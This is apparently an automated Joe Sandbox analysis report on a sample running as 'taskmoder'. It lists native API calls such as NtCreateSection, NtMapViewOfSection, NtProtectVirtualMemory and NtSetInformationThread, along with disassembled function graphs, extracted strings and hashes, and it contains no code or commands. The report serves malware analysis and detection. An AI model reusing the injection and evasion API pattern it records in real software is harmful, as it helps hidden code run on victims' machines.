                                                                                        execution_graph 18877 10ab688 18878 10ab6cc NtSetInformationThread 18877->18878 18880 10ab739 18878->18880 18893 10ac618 18894 10ac664 NtMapViewOfSection 18893->18894 18896 10ac727 18894->18896 18905 10ac7a8 18906 10ac7f1 NtQueryVolumeInformationFile 18905->18906 18908 10ac869 18906->18908 18917 10ac3b8 18918 10ac407 NtCreateSection 18917->18918 18920 10ac495 18918->18920 18881 10ac500 18882 10ac549 NtQuerySystemInformation 18881->18882 18884 10ac5b6 18882->18884 18885 10ac280 18886 10ac2cf NtOpenFile 18885->18886 18888 10ac352 18886->18888 18889 10ab9c0 18890 10aba0c NtAllocateVirtualMemory 18889->18890 18892 10aba8f 18890->18892 18897 10ab890 18898 10ab8df NtProtectVirtualMemory 18897->18898 18900 10ab957 18898->18900 18901 10ac8d0 18902 10ac919 NtDeviceIoControlFile 18901->18902 18904 10ac9c8 18902->18904 18909 10ab560 18910 10ab5a9 NtQueryInformationProcess 18909->18910 18912 10ab621 18910->18912 18913 10ab7a0 18914 10ab7e4 NtClose 18913->18914 18916 10ab830 18914->18916

                                                                                        Executed Functions

                                                                                        Function 00BD11A8 Relevance: 20.2, Strings: 10, Instructions: 7698COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2918806066.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_bd0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ?"$f$(%0\$*N$g$#tM$3`M$3iM$;qM$CpM$cLM
                                                                                        • API String ID: 0-2744610538
                                                                                        • Opcode ID: 764de946c5d3de0fbc558ae9005a6b8bd9e1e1b0f91bdc78ecf8f5dad826c57e
                                                                                        • Instruction ID: 436755b5562d922ab3d79b47a3a30038ef4c80e9dd5f2a11c39bd9c2e6f9c42a
                                                                                        • Opcode Fuzzy Hash: 764de946c5d3de0fbc558ae9005a6b8bd9e1e1b0f91bdc78ecf8f5dad826c57e
                                                                                        • Instruction Fuzzy Hash: 9D04C075E002199FCBA4DFA9D940A9DF7B2EF89310F10C1EA9819A7750DB35AE81CF41
                                                                                        Function 00A01468 Relevance: 5.1, Strings: 4, Instructions: 69COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1603 a01468-a01489 1604 a01490-a01495 1603->1604 1605 a0148b 1603->1605 1606 a014b6 1604->1606 1607 a01497-a014a0 1604->1607 1605->1604 1608 a014b9-a014c0 1606->1608 1609 a014a2-a014a5 1607->1609 1610 a014a7-a014aa 1607->1610 1612 a014e1 1608->1612 1613 a014c2-a014cb 1608->1613 1611 a014b4 1609->1611 1610->1611 1611->1608 1614 a014e4-a014eb 1612->1614 1615 a014d2-a014d5 1613->1615 1616 a014cd-a014d0 1613->1616 1617 a0150c 1614->1617 1618 a014ed-a014f6 1614->1618 1619 a014df 1615->1619 1616->1619 1622 a0150f-a01528 1617->1622 1620 a014f8-a014fb 1618->1620 1621 a014fd-a01500 1618->1621 1619->1614 1623 a0150a 1620->1623 1621->1623 1624 a0152f-a01533 1622->1624 1623->1622
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4']q$4']q$$]q$$]q
                                                                                        • API String ID: 0-978391646
                                                                                        • Opcode ID: 25f3c35ab95e7dcfd4b0c9346895d35b0fbb50e4814a2749e0e5b3c4f1d55d4f
                                                                                        • Instruction ID: 7553756d755bf10035c96ca4fb7d5ccdb73293f7c2d73ff9e571f23f11bf6b95
                                                                                        • Opcode Fuzzy Hash: 25f3c35ab95e7dcfd4b0c9346895d35b0fbb50e4814a2749e0e5b3c4f1d55d4f
                                                                                        • Instruction Fuzzy Hash: 3B21F570E0021CEFCB28DF98E580AEDBBB1BB44311F208595D811AB3A0D3359E40DB95
                                                                                        Function 00A00193 Relevance: 3.8, Strings: 3, Instructions: 89COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1653 a00193-a001ad 1654 a00151-a00159 1653->1654 1655 a001af-a001cb 1653->1655 1658 a00143-a0014b 1654->1658 1659 a0015b 1654->1659 1656 a001d2-a001d6 1655->1656 1657 a001cd 1655->1657 1660 a001f7 1656->1660 1661 a001d8-a001e1 1656->1661 1657->1656 1662 a00152-a00155 1658->1662 1663 a0014d-a00150 1658->1663 1664 a0015f-a0017b 1659->1664 1665 a001fa-a00201 1660->1665 1667 a001e3-a001e6 1661->1667 1668 a001e8-a001eb 1661->1668 1662->1664 1663->1664 1675 a00182-a0018b 1664->1675 1669 a00222 1665->1669 1670 a00203-a0020c 1665->1670 1671 a001f5 1667->1671 1668->1671 1674 a00225-a0022c 1669->1674 1672 a00213-a00216 1670->1672 1673 a0020e-a00211 1670->1673 1671->1665 1676 a00220 1672->1676 1673->1676 1677 a0024d 1674->1677 1678 a0022e-a00237 1674->1678 1676->1674 1681 a00250-a00262 1677->1681 1679 a00239-a0023c 1678->1679 1680 a0023e-a00241 1678->1680 1682 a0024b 1679->1682 1680->1682 1682->1681
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4']q$$]q$$]q
                                                                                        • API String ID: 0-3019551829
                                                                                        • Opcode ID: 90804dba60ccdefca916dbe52b829900d59d3a5cfecd541f9376a9d07284729d
                                                                                        • Instruction ID: 5303d9469fe14b47d12df95982c342c686dae4fea560f812a44faf9a968970a2
                                                                                        • Opcode Fuzzy Hash: 90804dba60ccdefca916dbe52b829900d59d3a5cfecd541f9376a9d07284729d
                                                                                        • Instruction Fuzzy Hash: 56316C70D0924CEFCB16CFA8E854BEDBBB1BF16301F2141A6D854AB291D3359E44DB51
                                                                                        Function 00BDECC9 Relevance: 3.1, Strings: 2, Instructions: 585COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1684 bdecc9-bded09 1687 bded0b 1684->1687 1688 bded10-bded17 1684->1688 1687->1688 1689 bded1a-bded43 1688->1689 1691 bded49-bded5d 1689->1691 1692 bdee46-bdee50 1689->1692 1695 bded5f-bded70 1691->1695 1696 bded72-bded92 1691->1696 1693 bdedd6-bdeded 1692->1693 1694 bdee52-bdee74 1692->1694 1702 bdedef-bdedfb 1693->1702 1703 bdee17 1693->1703 1694->1695 1701 bdee7a-bdee8b 1694->1701 1695->1693 1695->1696 1696->1693 1700 bded94-bdedcf 1696->1700 1700->1693 1704 bdee8d 1701->1704 1705 bdee94-bdf2f0 1701->1705 1706 bdedfd-bdee03 1702->1706 1707 bdee05-bdee0b 1702->1707 1708 bdee1d-bdee29 1703->1708 1704->1705 1710 bdef5c-bdef95 1704->1710 1711 bdeff8-bdf00c 1704->1711 1712 bdee9a-bdeea1 1704->1712 1713 bdef9a-bdefb4 1704->1713 1714 bdf235-bdf26e 1704->1714 1715 bdeef6-bdef18 1704->1715 1716 bdf170-bdf181 1704->1716 1717 bdf273-bdf287 1704->1717 1718 bdf1d2-bdf1de 1704->1718 1719 bdf10b-bdf11f 1704->1719 1720 bdf061-bdf0bb 1704->1720 1721 bdf0c0-bdf106 call bdae58 1704->1721 1705->1695 1726 bdf2f6-bdf366 1705->1726 1723 bdee15 1706->1723 1707->1723 1821 bdee2f call bdfc58 1708->1821 1822 bdee2f call bdfc48 1708->1822 1734 bdf6d4-bdf6e0 1710->1734 1711->1695 1728 bdf012-bdf05c 1711->1728 1712->1695 1729 bdeea7-bdeef1 1712->1729 1713->1689 1725 bdefba-bdeff3 1713->1725 1714->1734 1715->1689 1731 bdef1e-bdef42 1715->1731 1716->1689 1727 bdf187-bdf1cd 1716->1727 1717->1689 1732 bdf28d-bdf2e0 1717->1732 1718->1689 1730 bdf1e4-bdf230 1718->1730 1719->1689 1733 bdf125-bdf16b 1719->1733 1720->1734 1721->1734 1723->1708 1724 bdee35-bdee41 1724->1734 1725->1734 1775 bdf36c-bdf37a 1726->1775 1776 bdf423-bdf42a 1726->1776 1727->1734 1728->1734 1729->1734 1730->1734 1774 bdef4b-bdef57 1731->1774 1732->1734 1733->1734 1774->1734 1775->1689 1777 bdf380-bdf387 1775->1777 1776->1689 1778 bdf430-bdf47e 1776->1778 1779 bdf389-bdf39e 1777->1779 1780 bdf3a0-bdf3b5 1777->1780 1790 bdf525-bdf530 1778->1790 1791 bdf484-bdf492 1778->1791 1781 bdf3f3-bdf41e 1779->1781 1780->1689 1782 bdf3bb-bdf3ce 1780->1782 1781->1734 1784 bdf3e0-bdf3f0 1782->1784 1785 bdf3d0-bdf3d6 1782->1785 1784->1781 1785->1784 1790->1695 1794 bdf536-bdf559 1790->1794 1792 bdf4c4-bdf4d0 1791->1792 1793 bdf494-bdf4b6 1791->1793 1796 bdf4e2-bdf4f2 1792->1796 1797 bdf4d2-bdf4d8 1792->1797 1793->1701 1795 bdf4bc-bdf4c2 1793->1795 1800 bdf55b-bdf59d 1794->1800 1801 bdf5a2-bdf5c5 1794->1801 1798 bdf4f5-bdf50b 1795->1798 1796->1798 1797->1796 1805 bdf514-bdf520 1798->1805 1800->1734 1806 bdf5cb-bdf5d2 1801->1806 1807 bdf696-bdf6d2 call bda058 1801->1807 1805->1734 1806->1689 1809 bdf5d8-bdf5e6 1806->1809 1807->1734 1811 bdf5e8-bdf608 1809->1811 1812 bdf60a-bdf61d 1809->1812 1814 bdf648-bdf694 1811->1814 1812->1689 1815 bdf623-bdf645 1812->1815 1814->1734 1815->1814 1821->1724 1822->1724
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2918806066.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_bd0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ,A0$$9x/]
                                                                                        • API String ID: 0-3085129531
                                                                                        • Opcode ID: dbc26e202c9e1e7b40f90fa7dd2ad44e995cf27f8267b3350addef44b2839856
                                                                                        • Instruction ID: 7e1cada13f84a30bdca446d72f63ae8da930d2e82267424534f7026fbc208442
                                                                                        • Opcode Fuzzy Hash: dbc26e202c9e1e7b40f90fa7dd2ad44e995cf27f8267b3350addef44b2839856
                                                                                        • Instruction Fuzzy Hash: 7752B174E002199FDB54DFA9C894BACB7B2FB48300F14C5EAD51AAB350EA349E85DF11
                                                                                        Function 00BDC871 Relevance: 2.7, Strings: 2, Instructions: 176COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1823 bdc871-bdc89b 1825 bdc89d 1823->1825 1826 bdc8a2-bdc8ac 1823->1826 1825->1826 1827 bdc8b3-bdc8c4 1826->1827 1870 bdc8c7 call bdc871 1827->1870 1871 bdc8c7 call bdc980 1827->1871 1828 bdc8cd-bdc906 1830 bdc908-bdc90f 1828->1830 1831 bdc944-bdc9a5 1828->1831 1830->1827 1832 bdc911-bdc91c 1830->1832 1843 bdc9ac-bdc9f3 1831->1843 1844 bdc9a7 1831->1844 1834 bdc93d 1832->1834 1835 bdc91e-bdc927 1832->1835 1838 bdc940-bdc943 1834->1838 1836 bdc92e-bdc931 1835->1836 1837 bdc929-bdc92c 1835->1837 1839 bdc93b 1836->1839 1837->1839 1839->1838 1845 bdc9f6-bdca08 1843->1845 1844->1843 1847 bdca0a-bdca24 1845->1847 1848 bdca26-bdca48 1845->1848 1847->1847 1847->1848 1850 bdca4a-bdca5b 1848->1850 1851 bdcab7-bdcac0 1848->1851 1850->1847 1852 bdca5d-bdca68 1850->1852 1853 bdcac7-bdcadf 1851->1853 1854 bdca89 1852->1854 1855 bdca6a-bdca73 1852->1855 1857 bdcb1b-bdcb2f 1853->1857 1858 bdcae1-bdcb02 1853->1858 1856 bdca8c-bdca9b 1854->1856 1859 bdca7a-bdca7d 1855->1859 1860 bdca75-bdca78 1855->1860 1856->1845 1863 bdcaa1-bdcab5 1856->1863 1861 bdcb31-bdcb45 1857->1861 1858->1845 1867 bdcb08-bdcb15 1858->1867 1862 bdca87 1859->1862 1860->1862 1864 bdcb5d 1861->1864 1865 bdcb47-bdcb56 1861->1865 1862->1856 1863->1861 1869 bdcb5e 1864->1869 1865->1864 1867->1845 1867->1857 1869->1869 1870->1828 1871->1828
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2918806066.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_bd0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: %I3S$\;]q
                                                                                        • API String ID: 0-3198131726
                                                                                        • Opcode ID: f19b314aee113639ac537615baecf819124c4692002e03607841d696cb23839d
                                                                                        • Instruction ID: 20bd92f43b3d81afaed99ee8c2a2d6709e6d463439cd815e0152980dfaaabc39
                                                                                        • Opcode Fuzzy Hash: f19b314aee113639ac537615baecf819124c4692002e03607841d696cb23839d
                                                                                        • Instruction Fuzzy Hash: 837122B0D0020A9FCB59CFA9C9956EEFFF2AF89300F2481AAD415A7354E7744945CF94
                                                                                        Function 00BDC980 Relevance: 2.6, Strings: 2, Instructions: 131COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1872 bdc980-bdc9a5 1873 bdc9ac-bdc9f3 1872->1873 1874 bdc9a7 1872->1874 1875 bdc9f6-bdca08 1873->1875 1874->1873 1877 bdca0a-bdca24 1875->1877 1878 bdca26-bdca48 1875->1878 1877->1877 1877->1878 1880 bdca4a-bdca5b 1878->1880 1881 bdcab7-bdcac0 1878->1881 1880->1877 1882 bdca5d-bdca68 1880->1882 1883 bdcac7-bdcadf 1881->1883 1884 bdca89 1882->1884 1885 bdca6a-bdca73 1882->1885 1887 bdcb1b-bdcb2f 1883->1887 1888 bdcae1-bdcb02 1883->1888 1886 bdca8c-bdca9b 1884->1886 1889 bdca7a-bdca7d 1885->1889 1890 bdca75-bdca78 1885->1890 1886->1875 1893 bdcaa1-bdcab5 1886->1893 1891 bdcb31-bdcb45 1887->1891 1888->1875 1897 bdcb08-bdcb15 1888->1897 1892 bdca87 1889->1892 1890->1892 1894 bdcb5d 1891->1894 1895 bdcb47-bdcb56 1891->1895 1892->1886 1893->1891 1899 bdcb5e 1894->1899 1895->1894 1897->1875 1897->1887 1899->1899
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2918806066.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_bd0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: \;]q$\;]q
                                                                                        • API String ID: 0-2634542824
                                                                                        • Opcode ID: 9f8f54ce41d577d2d82b13b8948d4d9538d99f81d1b1ade48796d5d310e3e80f
                                                                                        • Instruction ID: 4271f7e96c9d08400695b1cb9e21c9b8924cd23e31ac851b53ce5e85bc281d5a
                                                                                        • Opcode Fuzzy Hash: 9f8f54ce41d577d2d82b13b8948d4d9538d99f81d1b1ade48796d5d310e3e80f
                                                                                        • Instruction Fuzzy Hash: EA51EFB0D0120D8BCB58CFAAC5956DDFBF2AF88310F14816AD411B6354E7749845CF68
                                                                                        Function 00A01460 Relevance: 2.6, Strings: 2, Instructions: 58COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1950 a01460-a01489 1952 a01490-a01495 1950->1952 1953 a0148b 1950->1953 1954 a014b6 1952->1954 1955 a01497-a014a0 1952->1955 1953->1952 1956 a014b9-a014c0 1954->1956 1957 a014a2-a014a5 1955->1957 1958 a014a7-a014aa 1955->1958 1960 a014e1 1956->1960 1961 a014c2-a014cb 1956->1961 1959 a014b4 1957->1959 1958->1959 1959->1956 1962 a014e4-a014eb 1960->1962 1963 a014d2-a014d5 1961->1963 1964 a014cd-a014d0 1961->1964 1965 a0150c 1962->1965 1966 a014ed-a014f6 1962->1966 1967 a014df 1963->1967 1964->1967 1970 a0150f-a01528 1965->1970 1968 a014f8-a014fb 1966->1968 1969 a014fd-a01500 1966->1969 1967->1962 1971 a0150a 1968->1971 1969->1971 1972 a0152f-a01533 1970->1972 1971->1970
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4']q$$]q
                                                                                        • API String ID: 0-191797025
                                                                                        • Opcode ID: 8948b1a6381ed474138d4708ba6e66a83b111638e502a78422f3a6c7177944c9
                                                                                        • Instruction ID: 54549724c25e97d7a8198b31088a703189ec4add13655644a4e9b7529b1f53e7
                                                                                        • Opcode Fuzzy Hash: 8948b1a6381ed474138d4708ba6e66a83b111638e502a78422f3a6c7177944c9
                                                                                        • Instruction Fuzzy Hash: 8C210DB0D0520DDFCB25CFE8E580AEDBBB1BB45311F608599D415A72A0D3359E80DF54
                                                                                        Function 00A000E8 Relevance: 2.6, Strings: 2, Instructions: 56COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1994 a000e8-a00109 1995 a00110-a00115 1994->1995 1996 a0010b 1994->1996 1997 a00136 1995->1997 1998 a00117-a00120 1995->1998 1996->1995 1999 a00139-a00140 1997->1999 2000 a00122-a00125 1998->2000 2001 a00127-a0012a 1998->2001 2002 a00161 1999->2002 2003 a00142-a0014b 1999->2003 2004 a00134 2000->2004 2001->2004 2007 a00164-a0017b 2002->2007 2005 a00152-a00155 2003->2005 2006 a0014d-a00150 2003->2006 2004->1999 2008 a0015f 2005->2008 2006->2008 2009 a00182-a0018b 2007->2009 2008->2007
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $]q$$]q
                                                                                        • API String ID: 0-127220927
                                                                                        • Opcode ID: 6d67ca85344934aa67fad5111698e3be08247f6ea00dcdc91b97ada7eb96dcb1
                                                                                        • Instruction ID: 57fa51d543061502ef9de427e9437ee96382e0f48cf3f4762c7a2d928cde47cf
                                                                                        • Opcode Fuzzy Hash: 6d67ca85344934aa67fad5111698e3be08247f6ea00dcdc91b97ada7eb96dcb1
                                                                                        • Instruction Fuzzy Hash: 6721DA74D0521DEFCB14DFA8D940AAEBBB1BF05301F6085A9D814A7390D3749E40DF91
                                                                                        Function 00A00340 Relevance: 2.5, Strings: 2, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $]q$$]q
                                                                                        • API String ID: 0-127220927
                                                                                        • Opcode ID: 41bfb9eb278ec52c86ebc33c4b2866b9e370473eb8fd79e140d6ad1196344836
                                                                                        • Instruction ID: 37d3a9e70984b25e4fc557286916208cb275b41e607fd6aefbeec5256d0cb944
                                                                                        • Opcode Fuzzy Hash: 41bfb9eb278ec52c86ebc33c4b2866b9e370473eb8fd79e140d6ad1196344836
                                                                                        • Instruction Fuzzy Hash: FB01E574D0420DDFCB19DFA8E580ABEBBF1BB45300F2085AA9814B7390D7309E40CBA6
                                                                                        Function 02924908 Relevance: 1.7, Strings: 1, Instructions: 476COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.3016913606.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_2920000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 59C
                                                                                        • API String ID: 0-641190316
                                                                                        • Opcode ID: 3587f5636f0182125624fa35f19734830af862ee360f4db461200c66828db240
                                                                                        • Instruction ID: 6a0d7316476c9e6d605c944806b280bdb35ed5275fa6ec40a8581c37e8b9f616
                                                                                        • Opcode Fuzzy Hash: 3587f5636f0182125624fa35f19734830af862ee360f4db461200c66828db240
                                                                                        • Instruction Fuzzy Hash: 0422B8B4E0021A8FDB54CFA9C5825AEFBF2BF88314F248169D509E7345D734AA95CF90
                                                                                        Function 010AC611 Relevance: 1.6, APIs: 1, Instructions: 146nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,?,?), ref: 010AC715
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2997248781.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_10a0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID: SectionView
                                                                                        • String ID:
                                                                                        • API String ID: 1323581903-0
                                                                                        • Opcode ID: 6b3891b7ff43e0dc5dbe1557024fe1dd5cbd2db2df0ee3d9602fbe6194377f66
                                                                                        • Instruction ID: 6d2a746fb9596bcc557c3b3f4a0ac10986f4ba7485bdeefb7c1ea8018a05971f
                                                                                        • Opcode Fuzzy Hash: 6b3891b7ff43e0dc5dbe1557024fe1dd5cbd2db2df0ee3d9602fbe6194377f66
                                                                                        • Instruction Fuzzy Hash: F45189B9D042589FCF10DFA9D9809DEFBB1BF5A310F20A12AE908B7210D735A945CF54
                                                                                        Function 010AC618 Relevance: 1.6, APIs: 1, Instructions: 144nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,?,?), ref: 010AC715
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2997248781.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_10a0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID: SectionView
                                                                                        • String ID:
                                                                                        • API String ID: 1323581903-0
                                                                                        • Opcode ID: 17f6a10ac87aa3e34296a40679845ace51a6d38b120351c36e9b25a6d767f218
                                                                                        • Instruction ID: 554e518835277fba57cbea1fe6df9a8e75bace26e3cee500dcb04d8e7da8fab0
                                                                                        • Opcode Fuzzy Hash: 17f6a10ac87aa3e34296a40679845ace51a6d38b120351c36e9b25a6d767f218
                                                                                        • Instruction Fuzzy Hash: D55178B9D042589BCF10DFA9D9809DEFBB1FF5A310F20A12AE918B7210D735A945CF54
                                                                                        Function 010AC8C8 Relevance: 1.6, APIs: 1, Instructions: 141filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtDeviceIoControlFile.NTDLL(?,?,?,?,?,?,?,?,?,?), ref: 010AC9B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2997248781.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_10a0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID: ControlDeviceFile
                                                                                        • String ID:
                                                                                        • API String ID: 3512290074-0
                                                                                        • Opcode ID: dae64b7918e7fede6c321646900cf79f58435ba743e743bc81006c1e7606f07b
                                                                                        • Instruction ID: fc03cfbe0e121df6fad4fbd014ac7b8e78a6f8bc0eba5f9b480f42d55d16ecec
                                                                                        • Opcode Fuzzy Hash: dae64b7918e7fede6c321646900cf79f58435ba743e743bc81006c1e7606f07b
                                                                                        • Instruction Fuzzy Hash: 0E4179B9D042589FCF10CFE9D9849DEFBB1BB1A310F24A02AE918B7210D735A955CF54
                                                                                        Function 010AC8D0 Relevance: 1.6, APIs: 1, Instructions: 138filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtDeviceIoControlFile.NTDLL(?,?,?,?,?,?,?,?,?,?), ref: 010AC9B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2997248781.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_10a0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID: ControlDeviceFile
                                                                                        • String ID:
                                                                                        • API String ID: 3512290074-0
                                                                                        • Opcode ID: 62ad0632b75bf21252af7e988734e519c639f012da629f7838fc4740f292f773
                                                                                        • Instruction ID: 29cbbf3f8bbe58610a900d2fddb268ef4e9044190d3b4950522a4b43b9f2c3c1
                                                                                        • Opcode Fuzzy Hash: 62ad0632b75bf21252af7e988734e519c639f012da629f7838fc4740f292f773
                                                                                        • Instruction Fuzzy Hash: 1E4177B9D042189FCF10CFA9D9849DEFBB1BB1A310F20A02AE918B7210D735A955CF58
                                                                                        Function 010AC3B1 Relevance: 1.6, APIs: 1, Instructions: 122nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 010AC483
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2997248781.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_10a0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateSection
                                                                                        • String ID:
                                                                                        • API String ID: 2449625523-0
                                                                                        • Opcode ID: edf3f93f946f9feb37f1bf6fbb19291745419fc6be0ea7067869c5570bf990fc
                                                                                        • Instruction ID: d296337bfcfd0beba02f668bb313570ea5c677688a0fd545a96696eae584b068
                                                                                        • Opcode Fuzzy Hash: edf3f93f946f9feb37f1bf6fbb19291745419fc6be0ea7067869c5570bf990fc
                                                                                        • Instruction Fuzzy Hash: 314189B9D002599FDF10CFA9D580AEEFBB1BF49310F24902AE819B7210D735A946CF94
                                                                                        Function 010AC3B8 Relevance: 1.6, APIs: 1, Instructions: 119nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 010AC483
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2997248781.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_10a0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateSection
                                                                                        • String ID:
                                                                                        • API String ID: 2449625523-0
                                                                                        • Opcode ID: 117ef355063fedce3aad55dfbfb0a1cfbb5c6810c59e08d31bde4971119f804f
                                                                                        • Instruction ID: 85c959da3676ddc8d66878de83a2cfd6e5eebb39e376e77543cd0a6b5c2b4f5d
                                                                                        • Opcode Fuzzy Hash: 117ef355063fedce3aad55dfbfb0a1cfbb5c6810c59e08d31bde4971119f804f
                                                                                        • Instruction Fuzzy Hash: 86417AB5D012589FCF00CFA9D580AEEFBB1BB09310F20902AE919B7210D735A945CF98
                                                                                        Function 010AB9B8 Relevance: 1.6, APIs: 1, Instructions: 115memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 010ABA7D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2997248781.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_10a0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2167126740-0
